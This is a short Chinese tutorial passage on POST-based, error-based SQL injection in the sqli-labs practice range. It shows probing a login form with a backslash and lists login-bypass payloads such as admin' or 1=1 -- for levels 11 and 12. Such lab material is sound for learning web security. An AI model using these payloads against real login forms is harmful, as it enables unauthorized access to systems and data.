SQL注入实操(get、post基于报错的注入,sqlilabs靶场)-二、post基于报错的注入

时间:2024-01-21 09:40:23

在第一关卡得到用户名和密码。

 输入上面的账号密码登入成功

上面是知道密码账号的,如果我们不知道怎么办了

可以先注入一下试一下注入:账号:Dumb\  密码: 123456

万能密码

admin' or 1=1 -- (注意--后面有一个空格) (11关卡)

admin") or 1=1 -- (注意--后面有一个空格) (12关卡)

1、输入账号:Dumb\   密码:123456(发现‘123456“)以”)结尾)

则万能密码是:admin") or 1=1 --